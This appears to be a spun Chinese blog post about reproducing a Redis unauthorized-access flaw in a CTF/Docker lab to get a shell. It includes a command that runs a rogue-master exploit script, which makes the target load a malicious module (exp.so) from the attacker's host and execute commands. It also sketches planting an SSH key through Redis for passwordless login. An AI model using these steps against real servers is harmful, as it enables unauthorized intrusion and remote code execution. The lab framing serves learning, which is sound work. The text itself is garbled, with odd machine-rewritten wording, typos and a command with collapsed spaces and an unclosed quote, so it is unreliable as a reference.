首页 > 编程知识 正文

redis漏洞利用,redis入侵

时间:2023-05-03 10:52:01 阅读:57459 作者:2993

Redis 4.x/5.x非法访问漏洞在Redis非法访问4.x/5.0.5或更低版本中,使用master/slave模式加载远程模块,并使用动态链接库执行任何命令

漏洞再现最近遇到ctf的主题是通过ssrf和redis的非法访问打入内部网get shell,希望通过docker再现以下漏洞。

引出环境打开环境后,如图所示

您可以使用redis-cli -h your-ipj连接到redis数据库,并清空所有数据。 也就是说,存在非法访问漏洞

使用poc执行远程命令

编译下载的poc目录下的redismoudleSDK

但是,编译也会报告错误。 因为没有安装redis-cli

因为以前安装了ubantu靶机,但没有安装kali (之后发现没有影响仔细查找和查看整个脚本),所以我的8888端口号被占用,无法运行

python3redis-master.py-r 192.168.11.147-p 6379-l 192.168.11.129-p 8888-fredismodulesssdk/exp.so-c“

实现命令的执行

另一种方法是使用ssh密钥

您可以使用我的kali在ssh上生成空密码,将密钥传输到目标机redis,然后使用ssh在不加密的情况下登录。

这样再现就完成了

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。